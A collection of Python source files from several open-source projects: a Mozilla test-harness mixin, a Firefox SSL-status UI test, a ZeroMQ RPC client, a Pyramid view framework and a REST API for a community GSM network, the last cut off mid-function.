self.tbpl_status = self.worst_level(TBPL_WARNING, self.tbpl_status,
levels=TBPL_WORST_LEVEL_TUPLE)
# Account for the possibility that no test summary was output.
if self.pass_count <= 0 and self.fail_count <= 0 and \
(self.known_fail_count is None or self.known_fail_count <= 0):
self.error('No tests run or test summary not found')
self.worst_log_level = self.worst_level(WARNING,
self.worst_log_level)
self.tbpl_status = self.worst_level(TBPL_WARNING,
self.tbpl_status,
levels=TBPL_WORST_LEVEL_TUPLE)
if return_code not in success_codes:
self.tbpl_status = self.worst_level(TBPL_FAILURE, self.tbpl_status,
levels=TBPL_WORST_LEVEL_TUPLE)
# we can trust in parser.worst_log_level in either case
return (self.tbpl_status, self.worst_log_level)
def append_tinderboxprint_line(self, suite_name):
# We are duplicating a condition (fail_count) from evaluate_parser and
# parse parse_single_line but at little cost since we are not parsing
# the log more then once. I figured this method should stay isolated as
# it is only here for tbpl highlighted summaries and is not part of
# buildbot evaluation or result status IIUC.
summary = tbox_print_summary(self.pass_count,
self.fail_count,
self.known_fail_count,
self.crashed,
self.leaked)
self.info("TinderboxPrint: %s<br/>%s\n" % (suite_name, summary))
class EmulatorMixin(object):
""" Currently dependent on both TooltoolMixin and TestingMixin)"""
def install_emulator_from_tooltool(self, manifest_path, do_unzip=True):
dirs = self.query_abs_dirs()
if self.tooltool_fetch(manifest_path, output_dir=dirs['abs_work_dir'],
cache=self.config.get("tooltool_cache", None)
):
self.fatal("Unable to download emulator via tooltool!")
if do_unzip:
unzip = self.query_exe("unzip")
unzip_cmd = [unzip, '-q', os.path.join(dirs['abs_work_dir'], "emulator.zip")]
self.run_command(unzip_cmd, cwd=dirs['abs_emulator_dir'], halt_on_failure=True,
fatal_exit_code=3)
def install_emulator(self):
dirs = self.query_abs_dirs()
self.mkdir_p(dirs['abs_emulator_dir'])
if self.config.get('emulator_url'):
self.download_unzip(self.config['emulator_url'], dirs['abs_emulator_dir'])
elif self.config.get('emulator_manifest'):
manifest_path = self.create_tooltool_manifest(self.config['emulator_manifest'])
do_unzip = True
if 'unpack' in self.config['emulator_manifest']:
do_unzip = False
self.install_emulator_from_tooltool(manifest_path, do_unzip)
elif self.buildbot_config:
props = self.buildbot_config.get('properties')
url = 'https://hg.mozilla.org/%s/raw-file/%s/b2g/test/emulator.manifest' % (
props['repo_path'], props['revision'])
manifest_path = self.download_file(url,
file_name='tooltool.tt',
parent_dir=dirs['abs_work_dir'])
if not manifest_path:
self.fatal("Can't download emulator manifest from %s" % url)
self.install_emulator_from_tooltool(manifest_path)
else:
self.fatal("Can't get emulator; set emulator_url or emulator_manifest in the config!")
if self.config.get('tools_manifest'):
manifest_path = self.create_tooltool_manifest(self.config['tools_manifest'])
do_unzip = True
if 'unpack' in self.config['tools_manifest']:
do_unzip = False
self.install_emulator_from_tooltool(manifest_path, do_unzip)
|
sr-murthy/firefox-ui-tests
|
firefox_ui_tests/remote/security/test_ssl_status_after_restart.py
|
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
from marionette_driver import Wait
from firefox_ui_harness.decorators import skip_if_e10s, skip_under_xvfb
from firefox_ui_harness import FirefoxTestCase
class TestSSLStatusAfterRestart(FirefoxTestCase):
def setUp(self):
FirefoxTestCase.setUp(self)
self.test_data = (
{
'url': 'https://ssl-dv.mozqa.com',
'identity': '',
'type': 'verifiedDomain'
},
{
'url': 'https://ssl-ev.mozqa.com/',
'identity': 'Mozilla Corporation',
'type': 'verifiedIdentity'
},
{
'url': 'https://ssl-ov.mozqa.com/',
'identity': '',
'type': 'verifiedDomain'
}
)
# Set browser to restore previous session
self.prefs.set_pref('browser.startup.page', 3)
self.identity_popup = self.browser.navbar.locationbar.identity_popup
def tearDown(self):
try:
self.windows.close_all([self.browser])
self.browser.tabbar.close_all_tabs([self.browser.tabbar.tabs[0]])
self.browser.switch_to()
self.identity_popup.close(force=True)
finally:
FirefoxTestCase.tearDown(self)
@skip_if_e10s
@skip_under_xvfb
def test_ssl_status_after_restart(self):
for item in self.test_data:
with self.marionette.using_context('content'):
self.marionette.navigate(item['url'])
self.verify_certificate_status(item)
self.browser.tabbar.open_tab()
self.restart()
for index, item in enumerate(self.test_data):
self.browser.tabbar.tabs[index].select()
self.verify_certificate_status(item)
def verify_certificate_status(self, item):
url, identity, cert_type = item['url'], item['identity'], item['type']
# Check the favicon
# TODO: find a better way to check, e.g., mozmill's isDisplayed
favicon_hidden = self.marionette.execute_script("""
return arguments[0].hasAttribute("hidden");
""", script_args=[self.browser.navbar.locationbar.favicon])
self.assertFalse(favicon_hidden)
self.identity_popup.box.click()
Wait(self.marionette).until(lambda _: self.identity_popup.is_open)
# Check the type shown on the idenity popup doorhanger
self.assertEqual(self.identity_popup.popup.get_attribute('className'),
cert_type,
'Certificate type is verified for ' + url)
# Check the identity label
self.assertEqual(self.identity_popup.organization_label.get_attribute('value'),
identity,
'Identity name is correct for ' + url)
# Get the information from the certificate
cert = self.browser.tabbar.selected_tab.certificate
# Open the Page Info window by clicking the More Information button
page_info = self.browser.open_page_info_window(
lambda _: self.identity_popup.more_info_button.click())
# Verify that the current panel is the security panel
self.assertEqual(page_info.deck.selected_panel, page_info.deck.security)
# Verify the domain listed on the security panel
# If this is a wildcard cert, check only the domain
if cert['commonName'].startswith('*'):
self.assertIn(self.security.get_domain_from_common_name(cert['commonName']),
page_info.deck.security.domain.get_attribute('value'),
'Expected domain found in certificate for ' + url)
else:
self.assertEqual(page_info.deck.security.domain.get_attribute('value'),
cert['commonName'],
'Domain value matches certificate common name.')
# Verify the owner listed on the security panel
if identity != '':
owner = cert['organization']
else:
owner = page_info.get_property('securityNoOwner')
self.assertEqual(page_info.deck.security.owner.get_attribute('value'), owner,
'Expected owner label found for ' + url)
# Verify the verifier listed on the security panel
self.assertEqual(page_info.deck.security.verifier.get_attribute('value'),
cert['issuerOrganization'],
'Verifier matches issuer of certificate for ' + url)
page_info.close()
|
Alidron/demo-nao
|
alidron-env/lib/python2.7/site-packages/netcall/base_client.py
|
# vim: fileencoding=utf-8 et ts=4 sts=4 sw=4 tw=0
"""
Base RPC client class
Authors:
* Brian Granger
* Alexander Glyzov
* Axel Voitier
"""
#-----------------------------------------------------------------------------
# Copyright (C) 2012-2014. Brian Granger, Min Ragan-Kelley, Alexander Glyzov,
# Axel Voitier
#
# Distributed under the terms of the BSD License. The full license is in
# the file LICENSE distributed as part of this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
from sys import exc_info
from random import randint
from logging import getLogger
import zmq
from zmq.utils import jsonapi
from .base import RPCBase
from .errors import RemoteRPCError, RPCError
from .utils import RemoteMethod
#-----------------------------------------------------------------------------
# RPC Client base
#-----------------------------------------------------------------------------
class RPCClientBase(RPCBase):
"""An RPC Client (base class)"""
logger = getLogger('netcall.client')
def _create_socket(self):
super(RPCClientBase, self)._create_socket()
self.socket = self.context.socket(zmq.DEALER)
self.socket.setsockopt(zmq.IDENTITY, self.identity)
def _build_request(self, method, args, kwargs, ignore=False, req_id=None):
req_id = req_id or ('%x' % randint(0, 0xFFFFFFFF)).encode()
method = method.encode()
msg_list = [b'|', req_id, method]
data_list = self._serializer.serialize_args_kwargs(args, kwargs)
msg_list.extend(data_list)
msg_list.append(str(int(ignore)).encode())
return req_id, msg_list
def _send_request(self, request):
self.logger.debug('sending %r', request)
self.socket.send_multipart(request)
def _parse_reply(self, msg_list):
"""
Parse a reply from service
(should not raise an exception)
The reply is received as a multipart message:
[b'|', req_id, type, payload ...]
Returns either None or a dict {
'type' : <message_type:bytes> # ACK | OK | YIELD | FAIL
'req_id' : <id:bytes>, # unique message id
'srv_id' : <service_id:bytes> | None # only for ACK messages
'result' : <object>
}
"""
logger = self.logger
if len(msg_list) < 4 or msg_list[0] != b'|':
logger.error('bad reply %r', msg_list)
return None
msg_type = msg_list[2]
data = msg_list[3:]
result = None
srv_id = None
if msg_type == b'ACK':
srv_id = data[0]
elif msg_type in (b'OK', b'YIELD'):
try:
result = self._serializer.deserialize_result(data)
except Exception as e:
msg_type = b'FAIL'
result = e
elif msg_type == b'FAIL':
try:
error = jsonapi.loads(msg_list[3])
if error['ename'] == 'StopIteration':
result = StopIteration()
elif error['ename'] == 'GeneratorExit':
result = GeneratorExit()
else:
result = RemoteRPCError(error['ename'], error['evalue'], error['traceback'])
except Exception as e:
logger.error('unexpected error while decoding FAIL', exc_info=True)
result = RPCError('unexpected error while decoding FAIL: %s' % e)
else:
result = RPCError('bad message type: %r' % msg_type)
return dict(
type = msg_type,
req_id = msg_list[1],
srv_id = srv_id,
result = result,
)
def _generator(self, req_id, get_val_exc):
""" Mirrors a service generator on a client side
"""
#logger = self.logger
def _send_cmd(cmd, args):
_, msg_list = self._build_request(
cmd, args, None, ignore=False, req_id=req_id
)
self._send_request(msg_list)
_send_cmd('_SEND', None)
while True:
val, exc = get_val_exc()
if exc is not None:
raise exc
try:
res = yield val
except GeneratorExit:
_send_cmd('_CLOSE', None)
except:
etype, evalue, _ = exc_info()
_send_cmd('_THROW', [etype.__name__, evalue])
else:
_send_cmd('_SEND', res)
def __getattr__(self, name):
return RemoteMethod(self, name)
def call(self, proc_name, args=[], kwargs={}, result='sync', timeout=None):
"""
Call the remote method with *args and **kwargs
(may raise an exception)
Parameters
----------
proc_name : <bytes> name of the remote procedure to call
args : <tuple> positional arguments of the remote procedure
kwargs : <dict> keyword arguments of the remote procedure
result : 'sync' | 'async' | 'ignore'
timeout : <float> | None
Number of seconds to wait for a reply.
RPCTimeoutError is raised in case of timeout.
Set to None, 0 or a negative number to disable.
Returns
-------
<result:object> if result is 'sync'
<Future> if result is 'async'
None if result is 'ignore'
If remote call fails:
- raises <RemoteRPCError> if result is 'sync'
- sets <RemoteRPCError> into the <Future> if result is 'async'
"""
assert result in ('sync', 'async', 'ignore'), \
'expected any of "sync", "async", "ignore" -- got %r' % result
if not (timeout is None or isinstance(timeout, (int, float))):
raise TypeError("timeout param: <float> or None expected, got %r" % timeout)
if not self._ready:
raise RuntimeError('bind or connect must be called first')
ignore = result == 'ignore'
req_id, msg_list = self._build_request(proc_name, args, kwargs, ignore)
self._send_request(msg_list)
if ignore:
return None
future = self._tools.Future()
self._futures[req_id] = future
if result == 'sync':
# block waiting for a reply passed by _reader
return future.result(timeout=timeout)
else:
# async
return future
|
ecreall/pontus
|
pontus/view.py
|
# Copyright (c) 2014 by Ecreall under licence AGPL terms
# available on http://www.gnu.org/licenses/agpl.html
# licence: AGPL
# author: Amen Souissi
import re
from collections import OrderedDict
from webob.multidict import MultiDict
from zope.interface import implementer
from pyramid.view import view_config
import pyramid.httpexceptions as exc
from pyramid import renderers
from pyramid.renderers import get_renderer
from pyramid_layout.layout import Structure
from substanced.util import get_oid
from dace.processinstance.core import Error, ValidationError
from pontus.interfaces import IView
from pontus.core import Step
from pontus.util import copy_dict, update_resources
from pontus.resources import (
BehaviorViewErrorPrincipalmessage,
BehaviorViewErrorSolutions)
from pontus import _, log
class ViewError(Error):
principalmessage = u""
causes = []
solutions = []
type = 'danger'
template = 'pontus:templates/views_templates/alert_message.pt'
def render_message(self, request, subject=None):
content_message = renderers.render(
self.template,
{'error': self, 'subject': subject}, request)
return content_message
EMPTY_TEMPLATE = 'templates/views_templates/empty.pt'
@implementer(IView)
class View(Step):
"""Abstract view"""
viewid = None
title = _('View')
description = ""
name = 'view'
coordinates = 'main'# default value
validators = []
wrapper_template = 'templates/views_templates/view_wrapper.pt'
template = None
requirements = None
css_class = "pontus-main-view"
container_css_class = ""
def render_item(self, item, coordinates, parent):
body = renderers.render(
self.wrapper_template,
{'coordinates': coordinates,
'subitem': item,
'parent': parent}, self.request)
return Structure(body)
def __init__(self,
context,
request,
parent=None,
wizard=None,
stepid=None,
**kwargs):
super(View, self).__init__(wizard, stepid)
self.context = context
self.request = request
self.parent = parent
if self.viewid is None:
self.viewid = self.name
if self.parent is not None:
self.viewid = self.parent.viewid + '_' + self.viewid
if self.context is not None:
self.viewid = self.viewid + '_' + str(get_oid(self.context, ''))
self._original_view_id = self.viewid
self._request_configuration()
def _request_configuration(self):
coordinates = self.params('coordinates')
if coordinates is not None:
self.coordinates = coordinates
@property
def requirements_copy(self):
if self.requirements is None:
return {'css_links': [], 'js_links': []}
else:
return copy_dict(self.requirements)
def has_id(self, id):
return self.viewid == id
def get_view_requirements(self):
return self.requirements_copy
def validate(self):
for validator in self.validators:
try:
validator.validate(self.context, self.request)
except ValidationError as error:
view_error = ViewError()
view_error.principalmessage = BehaviorViewErrorPrincipalmessage
if getattr(error, 'principalmessage', ''):
view_error.causes = [error.principalmessage]
view_error.solutions = BehaviorViewErrorSolutions
raise view_error
return True
def params(self, key=None):
result = []
if key is None:
return self.request.params
islist = False
list_key = key + '[]'
if list_key in self.request.params:
islist = True
if key in self.request.params or list_key in self.request.params:
dict_copy = self.request.params.copy()
dict_copy = MultiDict([(k.replace('[]', ''), value)
for (k, value) in dict_copy.items()])
while key in dict_copy:
result.append(dict_copy.pop(key))
len_result = len(result)
if not islist and len_result == 1:
return result[0]
elif islist or len_result > 1:
return result
return None
def before_update(self):
self.bind()
def update(self):
pass
def after_update(self):
pass
def __call__(self):
result = None
try:
self.validate()
self.before_update()
result = self.update()
self.after_update()
except ViewError as error:
log.warning(error)
raise error
except Exception as http_error:
log.exception(http_error)
raise exc.HTTPInternalServerError()
if isinstance(result, dict):
if 'js_links' not in result:
result['js_links'] = []
if 'css_links' not in result:
result['css_links'] = []
update_resources(self.request, result)
return result
def content(self, args, template=None, main_template=None):
if template is None:
template = self.template
if main_template is None:
main_template = get_renderer(EMPTY_TEMPLATE).implementation()
if isinstance(args, dict):
args['main_template'] = main_template
body = renderers.render(template, args, self.request)
return {'body': body,
'args': args}
def adapt_item(self, render, id, isactive=True):
if self.parent is not None:
isactive = False
item = {'view': self, 'id': id, 'isactive': isactive}
if isinstance(render, list):
item['items'] = render
else:
item['body'] = render
return item
def setviewid(self, viewid):
self.viewid = viewid
self._original_view_id = viewid
def failure(self, error, subject=None):
error_body = error.render_message(self.request, subject)
item = self.adapt_item('', self.viewid, True)
item['messages'] = {error.type: [error_body]}
result = {'js_links': [],
'css_links': [],
'coordinates': {self.coordinates: [item]}}
return result
def success(self, validated=None):
pass
def bind(self):
setattr(self, '_bindings', {})
@property
def bindings(self):
bindings = getattr(self, '_bindings', {}).copy()
if self.parent:
bindings.update(self.parent.bindings)
return bindings
def get_binding(self, key):
return self.bindings.get(key, None)
class ElementaryView(View):
"""Abstract view"""
behaviors = []
validate_behaviors = True
def __init__(self,
context,
request,
parent=None,
wizard=None,
stepid=None,
**kwargs):
super(ElementaryView, self).__init__(context, request, parent,
wizard, stepid, **kwargs)
self._all_validators = list(self.validators)
self.specific_behaviors_instances = []
self.behaviors_instances = OrderedDict()
self.errors = []
if 'behaviors' in kwargs:
bis = kwargs['behaviors']
self.specific_behaviors_instances = [bi for bi in bis
if bi._class_ in self.behaviors]
specific_behaviors = [b._class_ for b in
self.specific_behaviors_instances]
if self.validate_behaviors:
self._all_validators.extend([behavior.get_validator()
for behavior in self.behaviors
if behavior not in specific_behaviors])
self._init_behaviors(specific_behaviors)
def validate(self):
try:
for validator in self._all_validators:
validator.validate(self.context, self.request)
if self.validate_behaviors and self.specific_behaviors_instances:
for init_v in self.specific_behaviors_instances:
init_v.validate(self.context, self.request)
except ValidationError as error:
view_error = ViewError()
view_error.principalmessage = BehaviorViewErrorPrincipalmessage
if error.principalmessage:
view_error.causes = [error.principalmessage]
view_error.solutions = BehaviorViewErrorSolutions
raise view_error
return True
def _add_behaviorinstance(self, behaviorinstance):
key = re.sub(r'\s', '_', behaviorinstance.title)
self.behaviors_instances[key] = behaviorinstance
try:
self.viewid = self.viewid+'_'+str(get_oid(behaviorinstance))
except Exception:
pass
def _init_behaviors(self, specific_behaviors):
self.viewid = self._original_view_id
self.behaviors_instances = OrderedDict()
behaviors = [behavior for behavior in self.behaviors
if behavior not in specific_behaviors]
behaviors_instances = []
for behavior in behaviors:
try:
wizard_behavior = None
if self.wizard:
wizard_behavior = self.wizard.behaviorinstance
behaviorinstance = behavior.get_instance(self.context,
self.request,
wizard=wizard_behavior,
validate=False)
if behaviorinstance:
behaviors_instances.append(behaviorinstance)
except ValidationError as error:
self.errors.append(error)
for behaviorinstance in self.specific_behaviors_instances:
behaviors_instances.append(behaviorinstance)
behaviors_instances = sorted(
behaviors_instances,
key=lambda e:
self.behaviors.index(e.__class__))
for behaviorinstance in behaviors_instances:
self._add_behaviorinstance(behaviorinstance)
def before_update(self):
self.bind()
for behavior in self.behaviors_instances.values():
behavior.before_execution(self.context, self.request)
def execute(self, appstruct=None):
results = []
for behavior in self.behaviors_instances.values():
results.append(behavior.execute(
self.context, self.request, appstruct))
return results
def after_update(self):
pass
class BasicView(ElementaryView):
"""Basic view"""
isexecutable = False
def __init__(self,
context,
request,
parent=None,
wizard=None,
stepid=None,
**kwargs):
super(BasicView, self).__init__(context, request, parent,
wizard, stepid, **kwargs)
self.finished_successfully = True
def update(self):
return {}
@view_config(
context=ViewError,
renderer='pontus:templates/views_templates/grid.pt',
)
class ViewErrorView(BasicView):
title = _('An error has occurred!')
name = 'viewerrorview'
template = 'pontus:templates/views_templates/alert_message.pt'
def update(self):
self.title = self.request.localizer.translate(self.title)
result = {}
body = self.content(
args={'error': self.context}, template=self.template)['body']
item = self.adapt_item(body, self.viewid)
result['coordinates'] = {self.coordinates: [item]}
return result
|
saycel/saycel
|
rccn/rapi.py
|
############################################################################
#
# Copyright (C) 2013 tele <tele@rhizomatica.org>
#
# REST API Interface to RCCN Modules
# This file is part of RCCN
#
# RCCN is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# RCCN is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero Public License for more details.
#
# You should have received a copy of the GNU Affero Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
############################################################################
from corepost import Response, NotFoundException, AlreadyExistsException
from corepost.web import RESTResource, route, Http
from config import *
class SubscriberRESTService:
path = '/subscriber'
# get all subscribers
@route('/')
def getAll(self, request):
api_log.info('%s - [GET] %s' % (request.getHost().host, self.path))
try:
sub = Subscriber()
data = json.dumps(sub.get_all(), cls=PGEncoder)
except SubscriberException as e:
data = {'status': 'failed', 'error': str(e)}
api_log.info(data)
return data
# get subscriber
@route('/<msisdn>')
def get(self, request, msisdn):
api_log.info('%s - [GET] %s/%s' % (request.getHost().host, self.path, msisdn))
try:
sub = Subscriber()
if msisdn == 'all_connected':
data = json.dumps(sub.get_all_connected(), cls=PGEncoder)
elif msisdn == 'unpaid_subscription':
data = json.dumps(sub.get_unpaid_subscription(), cls=PGEncoder)
elif msisdn == 'paid_subscription':
data = json.dumps(sub.get_paid_subscription(), cls=PGEncoder)
elif msisdn == 'unauthorized':
data = json.dumps(sub.get_unauthorized(), cls=PGEncoder)
elif msisdn == 'online':
data = json.dumps(sub.get_online(), cls=PGEncoder)
elif msisdn == 'offline':
data = json.dumps(sub.get_offline(), cls=PGEncoder)
else:
data = json.dumps(sub.get(msisdn), cls=PGEncoder)
except SubscriberException as e:
data = {'status': 'failed', 'error': str(e)}
if msisdn != 'all_connected':
api_log.info(data)
return data
# get msisdn
@route('/extension/<imsi>')
def extension(self, request, imsi):
api_log.info('%s - [GET] %s/%s' % (request.getHost().host, self.path, imsi))
try:
sub =Subscriber()
data = json.dumps(sub.get_local_extension(imsi), cls=PGEncoder)
except SubscriberException as e:
data = {'status': 'failed', 'error': str(e)}
return data
# add new subscriber
@route('/', Http.POST)
def post(self, request, msisdn, name, balance, location):
api_log.info('%s - [POST] %s Data: msisdn:"%s" name:"%s" balance:"%s" location:"%s"' % (request.getHost().host, self.path, msisdn, name, balance, location))
try:
sub = Subscriber()
num = sub.add(msisdn, name, balance, location)
if num != msisdn:
data = {'status': 'success', 'error': num}
else:
data = {'status': 'success', 'error': ''}
except SubscriberException as e:
data = {'status': 'failed', 'error': str(e)}
api_log.info(data)
return data
# put subscriber offline
@route('/offline', Http.PUT)
def offline(self, request, imsi=''):
api_log.info('%s - [PUT] %s/offline Data: imsi:"%s"' % (request.getHost().host, self.path, imsi))
try:
sub = Subscriber()
sub.set_lac(imsi, 0)
data = {'status': 'success', 'error': ''}
except SubscriberException as e:
data = {'status': 'failed', 'error': str(e)}
api_log.info(data)
return data
# edit subscriber
@route('/<msisdn>', Http.PUT)
def put(self, request, msisdn='', name='', balance='', authorized='', subscription_status='', location=''):
api_log.info('%s - [PUT] %s/%s Data: name:"%s" balance:"%s" authorized:"%s" subscription_status:"%s" location:"%s"' % (request.getHost().host, self.path,
msisdn, name, balance, authorized, subscription_status, location))
try:
sub = Subscriber()
if authorized != '':
sub.authorized(msisdn, authorized)
if subscription_status != '':
sub.subscription(msisdn, subscription_status)
if msisdn != '' and name != '' or balance != '':
sub.edit(msisdn, name, balance, location)
data = {'status': 'success', 'error': ''}
except SubscriberException as e:
data = {'status': 'failed', 'error': str(e)}
api_log.info(data)
return data
# delete subscriber
@route('/<msisdn>', Http.DELETE)
def delete(self, request, msisdn):
api_log.info('%s - [DELETE] %s/%s' % (request.getHost().host, self.path, msisdn))
try:
sub = Subscriber()
sub.delete(msisdn)
data = {'status': 'success', 'error': ''}
except SubscriberException as e:
data = {'status': 'failed', 'error': str(e)}
api_log.info(data)
return data
class ResellerRESTService:
path = '/reseller'
# get all resellers
@route('/')
def getAll(self, request):
api_log.info('%s - [GET] %s' % (request.getHost(). host, self.path))
try:
reseller = Subscriber()
data = json.dumps(reseller.get_all(), cls=PGEncoder)
except ResellerException as e:
data = {'status': 'failed', 'error': str(e)}
api_log.info(data)
return data
# get reseller
@route('/<msisdn>')
def get(self, request, msisdn):
api_log.info('%s - [GET] %s/%s' % (request.getHost().host, self.path , msisdn))
try:
reseller = Reseller()
if msisdn == 'messages':
data = json.dumps(reseller.get_messages(), cls=PGEncoder)
else:
data = json.dumps(reseller.get(msisdn), cls=PGEncoder)
except ResellerException as e:
data = {'status': 'failed', 'error': str(e)}
api_log.info(data)
return data
# add new reseller
@route('/<msisdn>', Http.POST)
def post(self, request, msisdn, pin, balance):
api_log.info('%s - [POST] %s Data: msisdn:"%s" pin:"%s" balance:"%s"' % (request.getHost().host, self.path, msisdn, pin, balance))
try:
reseller = Reseller()
reseller.add(msisdn, pin, balance)
data = {'status': 'success', 'error': ''}
except ResellerException as e:
data = {'status': 'failed', 'error': str(e)}
api_log.info(data)
return data
# edit reseller
@route('/', Http.PUT)
def put(self, request, msisdn='', pin='', balance=''):
api_log.info('%s - [PUT] %s Data: msisdn:"%s" pin:"%s" balance:"%s"' % (request.getHost().host, self.path, msisdn, pin, balance))
try:
reseller = Reseller()
if msisdn != '' and pin != '' or balance != '':
reseller.edit(msisdn, pin, balance)
data = {'status': 'success', 'error': ''}
except ResellerException as e:
data = {'status': 'failed', 'error': str(e)}
api_log.info(data)
return data
# edit reseller notification messages
@route('/edit_messages', Http.PUT)
def put(self, request, mess1, mess2, mess3, mess4, mess5, mess6):
api_log.info('%s - [PUT] %s/edit_messages Data: mess1:"%s" mess2:"%s" mess3:"%s" mess4:"%s" mess5:"%s" mess6:"%s"' % (request.getHost().host, self.path,
mess1, mess2, mess3, mess4, mess5, mess6))
try:
reseller = Reseller()
reseller.edit_messages(mess1, mess2, mess3, mess4, mess5, mess6)
data = {'status': 'success', 'error': ''}
except ResellerException as e:
data = {'status': 'failed', 'error': str(e)}
api_log.info(data)
return data
# delete reseller
@route('/<msisdn>', Http.DELETE)
def delete(self, request, msisdn):
api_log.info('%s - [DELETE] %s/%s' % (request.getHost().host, self.path, msisdn))
try:
reseller = Reseller()
reseller.delete(msisdn)
data = {'status': 'success', 'error': ''}
except ResellerException as e:
data = {'status': 'failed', 'error': str(e)}
api_log.info(data)
return data
class CreditRESTService:
path = '/credit'
@route('/', Http.POST)
def post(self, request, msisdn, amount):
api_log.info('%s - [POST] %s/add Data: msisdn:"%s" amount:"%s"' % (request.getHost().host, self.path, msisdn, amount))
try:
credit = Credit()
credit.add(msisdn, amount)
data = {'status': 'success', 'error': ''}
except CreditException as e:
data = {'status': 'failed', 'error': str(e)}
api_log.info(data)
return data
@route('/reseller', Http.POST)
def reseller(self, request, msisdn, amount):
api_log.info('%s - [POST] %s/reseller Data: msisdn:"%s" amount:"%s"' % (request.getHost().host, self.path, msisdn, amount))
try:
credit = Credit()
credit.add_to_reseller(msisdn, amount)
data = {'status': 'success', 'error': ''}
except CreditException as e:
data = {'status': 'failed', 'error': str(e)}
api_log.info(data)
return data
class SMSRESTService:
path = '/sms'
@route('/', Http.POST)
def receive(self, request, source, destination, charset, coding, text):
api_log.info('%s - [POST] %s Data: source:"%s" destination:"%s" charset:"%s" coding: "%s" text:"%s"' % (request.getHost().host, self.path, source,
destination, charset, coding, text))
try:
sms = SMS()
sms.receive(source, destination, text, charset, coding)
data = {'status': 'success', 'error': ''}
except SMSException as e:
data = {'status': 'failed', 'error': str(e)}
api_log.info(data)
return data
@route('/send', Http.POST)
def send(self, request, source, destination, text):
api_log.info('%s - [POST] %s/send Data: source:"%s" destination:"%s" text:"%s"' % (request.getHost().host, self.path, source, destination, text))
try:
sms = SMS()
sms.send(source, destination, text)
data = {'status': 'success', 'error': ''}
except SMSException as e:
data = {'status': 'failed', 'error': str(e)}
api_log.info(data)
return data
@route('/send_broadcast', Http.POST)
def send_broadcast(self, request, text, btype):
api_log.info('%s - [POST] %s/send_broadcast Data: text:"%s" btype:"%s"' % (request.getHost().host, self.path, text, btype))
try:
sms = SMS()
sms.send_broadcast(text, btype)
data = {'status': 'success', 'error': ''}
except SMSException as e:
data = {'status': 'failed', 'error': str(e)}
api_log.info(data)
return data
class StatisticsRESTService:
path = '/statistics'
# Calls statistics
@route('/calls/total_calls')
def total_calls(self, request):
api_log.info('%s - [GET] %s/calls/total_calls' % (request.getHost().host, self.path))
try:
stats = CallsStatistics()
data = stats.get_total_calls()
except StatisticException as e:
data = {'status': 'failed', 'error': str(e)}
api_log.info(data)
return data
@route('/calls/total_minutes')
def total_minutes(self, request):
api_log.info('%s - [GET] %s/calls/total_minutes' % (request.getHost().host, self.path))
try:
stats = CallsStatistics()
data = stats.get_total_minutes()
except StatisticException as e:
data = {'status': 'failed', 'error': str(e)}
api_log.info(data)
return data
@route('/calls/average_call_duration')
def average_call_duration(self, request):
api_log.info('%s - [GET] %s/calls/average_call_duration' % (request.getHost().host, self.path))
try:
stats = CallsStatistics()
data = json.dumps(stats.get_average_call_duration(), cls=PGEncoder)
except StatisticException as e:
data = {'status': 'failed', 'error': str(e)}
api_log.info(data)
return data
@route('/calls/total_calls_by_context',Http.POST)
def total_calls_by_context(self, request, context):
api_log.info('%s - [POST] %s/calls/total_calls_by_context Data: context:"%s"' % (request.getHost().host, self.path, context))
try:
stats = CallsStatistics()
data = stats.get_total_calls_by_context(context)
except StatisticException as e:
data = {'status': 'failed', 'error': str(e)}
api_log.info(data)
return data
@route('/calls/calls',Http.POST)
def calls(self, request, period):
api_log.info('%s - [POST] %s/calls/calls Data: period:"%s"' % (request.getHost().host, self.path, period))
try:
stats = CallsStatistics()
data = json.dumps(stats.get_calls_stats(period), cls=PGEncoder)
except StatisticException as e:
data = {'status': 'failed', 'error': str(e)}
api_log.info(data)
return data
@route('/calls/calls_minutes',Http.POST)
def calls_minutes(self, request, period):
api_log.info('%s - [POST] %s/calls/calls_minutes Data: period:"%s"' % (request.getHost().host, self.path, period))
try:
stats = CallsStatistics()
data = json.dumps(stats.get_calls_minutes_stats(period), cls=PGEncoder)
except StatisticException as e:
data = {'status': 'failed', 'error': str(e)}
api_log.info(data)
return data
@route('/calls/calls_context',Http.POST)
def calls_context(self, request, period):
api_log.info('%s - [POST] %s/calls/calls_context Data: period:"%s"' % (request.getHost().host, self.path, period))
try:
stats = CallsStatistics()
data = json.dumps(stats.get_calls_context_stats(period), cls=PGEncoder)
except StatisticException as e:
data = {'status': 'failed', 'error': str(e)}
api_log.info(data)
return data
# Costs/Credits statistics
@route('/costs/total_spent')
def total_spent(self, request):
api_log.info('%s - [GET] %s/costs/total_spent' % (request.getHost().host, self.path))
try:
stats = CostsStatistics()
data = json.dumps(stats.get_total_spent(), cls=PGEncoder)
except StatisticException as e:
data = {'status': 'failed', 'error': str(e)}
api_log.info(data)
return data
@route('/costs/average_call_cost')
def average_call_cost(self, request):
api_log.info('%s - [GET] %s/costs/average_call_cost' % (request.getHost().host, self.path))
try:
stats = CostsStatistics()
data = json.dumps(stats.get_average_call_cost(), cls=PGEncoder)
except StatisticException as e:
data = {'status': 'failed', 'error': str(e)}
api_log.info(data)
return data
@route('/costs/total_spent_credits')
def total_spent_credits(self, request):
api_log.info('%s - [GET] %s/costs/total_spent_credits' % (request.getHost().host, self.path))
try:
stats = CostsStatistics()
data = json.dumps(stats.get_total_spent_credits(), cls=PGEncoder)
except StatisticException as e:
data = {'status': 'failed', 'error': str(e)}
api_log.info(data)
return data
@route('/costs/top_destinations')
def top_destinations(self, request):
api_log.info('%s - [GET] %s/top_destinations' % (request.getHost().host, self.path))
try:
stats = CostsStatistics()
data = json.dumps(stats.get_top_destinations(), cls=PGEncoder)
except StatisticException as e:
data = {'status': 'failed', 'error': str(e)}
api_log.info(data)
return data
@route('/costs/costs_stats', Http.POST)
def costs_stats(self, request, period):
api_log.info('%s - [POST] %s/costs/costs_stats Data: period:"%s"' % (request.getHost().host, self.path, period))
try:
stats = CostsStatistics()
